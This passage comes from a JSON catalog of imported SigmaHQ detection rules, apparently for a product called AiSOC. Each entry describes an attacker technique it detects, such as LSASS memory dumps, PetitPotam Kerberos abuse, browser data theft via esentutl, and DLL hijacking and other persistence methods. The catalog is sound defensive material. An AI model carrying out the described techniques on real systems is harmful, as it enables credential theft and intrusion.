}, { "id": "sigmahq-sigma-69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "type": "detection", "name": "HackTool - TruffleSnout Execution", "description": "Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low-noise enumeration.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-trufflesnout-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml" } }, { "id": "sigmahq-sigma-69ca12af-119d-44ed-b50f-a47af0ebc364", "type": "detection", "name": "LSASS Process Memory Dump Creation Via Taskmgr.EXE", "description": "Detects the creation of an \"lsass.dmp\" file by the taskmgr process. 
This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-memory-dump-creation-via-taskmgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69ca12af-119d-44ed-b50f-a47af0ebc364", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml" } }, { "id": "sigmahq-sigma-69ffc84e-8b1a-4024-8351-e018f66b8275", "type": "detection", "name": "FortiGate - User Group Modified", "description": "Detects the modification of a user group on a Fortinet FortiGate Firewall.\nThe group could be used to grant VPN access to a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-user-group-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "69ffc84e-8b1a-4024-8351-e018f66b8275", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_user_group_modified.yml" } }, { 
"id": "sigmahq-sigma-6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", "type": "detection", "name": "User Added To Root/Sudoers Group Using Usermod", "description": "Detects usage of the \"usermod\" binary to add users to the root or sudoers groups", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-root-sudoers-group-using-usermod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" } }, { "id": "sigmahq-sigma-6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "type": "detection", "name": "PetitPotam Suspicious Kerberos TGT Request", "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/petitpotam-suspicious-kerberos-tgt-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" } }, { "id": "sigmahq-sigma-6a5f68d1-c4b5-46b9-94ee-5324892ea939", "type": "detection", "name": "Uninstall Sysinternals Sysmon", "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uninstall-sysinternals-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml" } }, { "id": "sigmahq-sigma-6a69f62d-ce75-4b57-8dce-6351eb55b362", "type": "detection", "name": "Esentutl Steals Browser Information", "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esentutl-steals-browser-information.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" } }, { "id": "sigmahq-sigma-6a7ba45c-63d8-473e-9736-2eaabff79964", "type": "detection", "name": "AWS EFS Fileshare Mount Modified or Deleted", "description": "Detects when an EFS Fileshare Mount is modified or deleted. An adversary deleting a mount target breaks any file system using it, which might disrupt instances or applications using those mounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-efs-fileshare-mount-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6a7ba45c-63d8-473e-9736-2eaabff79964", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml" } }, { "id": 
"sigmahq-sigma-6aa12161-235a-4dfb-9c74-fe08df8d8da1", "type": "detection", "name": "Bitbucket Audit Log Configuration Updated", "description": "Detects changes to the bitbucket audit log configuration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-audit-log-configuration-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6aa12161-235a-4dfb-9c74-fe08df8d8da1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml" } }, { "id": "sigmahq-sigma-6aa1d992-5925-4e9f-a49b-845e51d1de01", "type": "detection", "name": "New DLL Added to AppCertDlls Registry Key", "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dll-added-to-appcertdlls-registry-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"6aa1d992-5925-4e9f-a49b-845e51d1de01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" } }, { "id": "sigmahq-sigma-6ad91e31-53df-4826-bd27-0166171c8040", "type": "detection", "name": "Google Cloud Kubernetes Admission Controller", "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. 
An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1552", "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-kubernetes-admission-controller.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ad91e31-53df-4826-bd27-0166171c8040", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml" } }, { "id": "sigmahq-sigma-6adfbf8f-52be-4444-9bac-81b539624146", "type": "detection", "name": "Shell Execution via Find - Linux", "description": "Detects the use of the find command to execute a shell. 
Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-find-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6adfbf8f-52be-4444-9bac-81b539624146", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_find_shell_execution.yml" } }, { "id": "sigmahq-sigma-6ae53108-c3a0-4bee-8f45-c7591a2c337f", "type": "detection", "name": "Deployment AppX Package Was Blocked By AppLocker", "description": "Detects an appx package deployment that was blocked by AppLocker policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deployment-appx-package-was-blocked-by-applocker.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml" } }, { "id": 
"sigmahq-sigma-6aef64e3-60c6-4782-8db3-8448759c714e", "type": "detection", "name": "Google Workspace Role Modified or Deleted", "description": "Detects when a role is modified or deleted in Google Workspace.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-role-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6aef64e3-60c6-4782-8db3-8448759c714e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_role_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-6b14bac8-3e3a-4324-8109-42f0546a347f", "type": "detection", "name": "Scheduled Cron Task/Job - Linux", "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-cron-task-job-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b14bac8-3e3a-4324-8109-42f0546a347f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" } }, { "id": "sigmahq-sigma-6b269392-9eba-40b5-acb6-55c882b20ba6", "type": "detection", "name": "Suspicious File Drop by Exchange", "description": "Detects suspicious file type dropped by an Exchange component in IIS", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-drop-by-exchange.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b269392-9eba-40b5-acb6-55c882b20ba6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" } }, { "id": "sigmahq-sigma-6b369ced-4b1d-48f1-b427-fdc0de0790bd", "type": 
"detection", "name": "Suspicious Diantz Alternate Data Stream Execution", "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-diantz-alternate-data-stream-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" } }, { "id": "sigmahq-sigma-6b65c28e-11f3-46cb-902a-68f2cafaf474", "type": "detection", "name": "Odbcconf.EXE Suspicious DLL Location", "description": "Detects execution of \"odbcconf\" where the path of the DLL being registered is located in a potentially suspicious location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/odbcconf-exe-suspicious-dll-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b65c28e-11f3-46cb-902a-68f2cafaf474", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml" } }, { "id": "sigmahq-sigma-6b67c12e-5e40-47c6-b3b0-1e6b571184cc", "type": "detection", "name": "Google Cloud Service Account Modified", "description": "Identifies when a service account is modified in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-service-account-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_service_account_modified.yml" } }, { "id": "sigmahq-sigma-6b6976a3-b0e6-4723-ac24-ae38a737af41", "type": "detection", "name": "Potential Persistence Via Shim Database In Uncommon Location", "description": "Detects the installation of a new shim database where the file is located in a non-default location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-shim-database-in-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b6976a3-b0e6-4723-ac24-ae38a737af41", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml" } }, { "id": "sigmahq-sigma-6b98b92b-4f00-4f62-b4fe-4d1920215771", "type": "detection", "name": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", "description": "Detects loading of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes, potentially indicating phantom DLL hijacking attempts.\nPhantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-non-existent-dlls-from-system-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" } }, { "id": "sigmahq-sigma-6ba5a05f-b095-4f0a-8654-b825f4f16334", "type": "detection", "name": "Potential MSTSC Shadowing Activity", "description": "Detects RDP session hijacking by using MSTSC shadowing", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1563.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mstsc-shadowing-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml" } }, { "id": "sigmahq-sigma-6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "type": "detection", "name": "Suspicious RASdial Activity", "description": "Detects suspicious process related to rasdial.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rasdial-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rasdial_execution.yml" } }, { "id": "sigmahq-sigma-6bd75993-9888-4f91-9404-e1e4e4e34b77", "type": "detection", "name": "HackTool - LocalPotato Execution", "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-localpotato-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml" } }, { "id": "sigmahq-sigma-6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" } }, { "id": "sigmahq-sigma-6c0a7755-6d31-44fa-80e1-133e57752680", "type": "detection", "name": "Windows Defender Threat Detection 
Service Disabled", "description": "Detects when the \"Windows Defender Threat Protection\" service is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-threat-detection-service-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c0a7755-6d31-44fa-80e1-133e57752680", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml" } }, { "id": "sigmahq-sigma-6c0ce3b6-85e2-49d4-9c3f-6e008ce9796e", "type": "detection", "name": "Suspicious Deno File Written from Remote Source", "description": "Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing its own malicious DLL.\nThis behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1204", "T1059.007", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-deno-file-written-from-remote-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c0ce3b6-85e2-49d4-9c3f-6e008ce9796e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_creation_deno.yml" } }, { "id": "sigmahq-sigma-6c220477-0b5b-4b25-bb90-66183b4089e8", "type": "detection", "name": "Suspicious Inbox Forwarding", "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-inbox-forwarding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6c220477-0b5b-4b25-bb90-66183b4089e8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml" } }, { "id": "sigmahq-sigma-6c304b02-06e6-402d-8be4-d5833cdf8198", "type": "detection", "name": "Potential SentinelOne Shell Context Menu Scan Command Tampering", "description": "Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-sentinelone-shell-context-menu-scan-command-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "6c304b02-06e6-402d-8be4-d5833cdf8198", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_sentinelone_shell_context_tampering.yml" } }, { "id": "sigmahq-sigma-6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", "type": "detection", "name": "New Cron File Created", "description": "Detects the creation of cron files in Cron directories, which could indicate potential persistence mechanisms being established by an attacker.\nNote that not all cron file creations are malicious - legitimate system administration activities and software installations may also create cron files.\nThis detection should be investigated in context, considering factors such as the user creating the file, the timing of creation, and the contents of the cron job.\nFocus investigation on unexpected cron files created by non-administrative users or during suspicious timeframes.\nAdditionally, it is recommended to review the contents of the newly created cron files to assess their intent.\nFurthermore, it is suggested to baseline normal cron file creation and apply additional filters to reduce false positives based on the specific environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 